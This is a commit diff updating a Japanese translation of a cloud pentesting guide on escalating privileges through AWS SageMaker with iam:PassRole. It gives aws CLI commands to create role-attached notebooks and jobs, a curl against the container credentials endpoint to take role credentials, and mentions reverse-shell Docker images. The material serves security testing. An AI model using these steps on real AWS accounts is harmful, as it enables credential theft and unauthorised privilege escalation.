Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/

This commit is contained in:
Translator
2025-01-05 22:58:04 +00:00
parent 6b153d797f
commit 8e707630c4
5 changed files with 317 additions and 46 deletions

View File

@@ -6,18 +6,18 @@
### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
IAMロールを使用してートブックを作成し始めます
IAMロールを使用して、添付されたノートブックを作成し始めます:
```bash
aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>
```
レスポンスには `NotebookInstanceArn` フィールドが含まれてり、これは新しく作成されたートブックインスタンスのARNを含みます。次に、`create-presigned-notebook-instance-url` APIを使用して、ートブックインスタンスが準備完了次第アクセスするためのURLを生成できます。
`NotebookInstanceArn` フィールドが含まれている必要があり、これは新しく作成されたノートブックインスタンスの ARN を含みます。次に、`create-presigned-notebook-instance-url` API を使用して、ノートブックインスタンスが準備完了次第アクセスするための URL を生成できます。
```bash
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>
```
ブラウザでURLに移動し、右上の \`Open JupyterLab\` をクリックします。次に「Launcher」タブまでスクロールし、「Other」セクションの下にある「Terminal」ボタンをクリックします。
ブラウザでURLに移動し、右上の \`Open JupyterLab\` をクリックし次に「Launcher」タブまでスクロールし、「Other」セクションの下にある「Terminal」ボタンをクリックします。
これで、IAMロールのメタデータ資格情報にアクセスすることが可能です。
@@ -45,14 +45,14 @@ aws sagemaker create-processing-job \
# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds
```
**潜在的影響:** 指定されたsagemakerサービスロールへの権限昇格。
**潜在的影響:** 指定されたsagemakerサービスロールへの権限昇格。
### `sagemaker:CreateTrainingJob`, `iam:PassRole`
これらの権限を持つ攻撃者は、**任意のコンテナを実行する**トレーニングジョブを作成でき、**ロール添付された**状態になります。したがって、攻撃者はそのロールの資格情報を盗むことができます。
これらの権限を持つ攻撃者は、**任意のコンテナを実行する**トレーニングジョブを作成でき、そのジョブに**ロール添付**することができます。したがって、攻撃者はそのロールの資格情報を盗むことができます。
> [!WARNING]
> このシナリオは、攻撃者がリバースシェルや資格情報を直接送信するDockerイメージを生成する必要があるため、前のシナリオよりも悪用が難しいです(トレーニングジョブの設定で開始コマンドを指定することはできません)。
> このシナリオは、前のものよりも悪用が難しいです。なぜなら、リバースシェルや資格情報を攻撃者に直接送信するDockerイメージを生成する必要があるからです(トレーニングジョブの設定で開始コマンドを指定することはできません)。
>
> ```bash
> # Dockerイメージを作成
@@ -95,9 +95,9 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
### `sagemaker:CreateHyperParameterTuningJob`, `iam:PassRole`
その権限を持つ攻撃者は(潜在的に)**ハイパーパラメータトレーニングジョブ**を作成し、**任意のコンテナ**をそれに**ロールを付けて**実行できる可能性があります。\
&#xNAN;_&#x49; 時間がないために悪用していませんが、以前の悪用と似ているようす。悪用の詳細を含むPRを送信してください。_
_時間がなかったため、私はこの脆弱性を悪用していませんが、以前の悪用と似ているように見えます。悪用の詳細を含むPRを送信しても構いません。_
## 参
## 参考文献
- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/)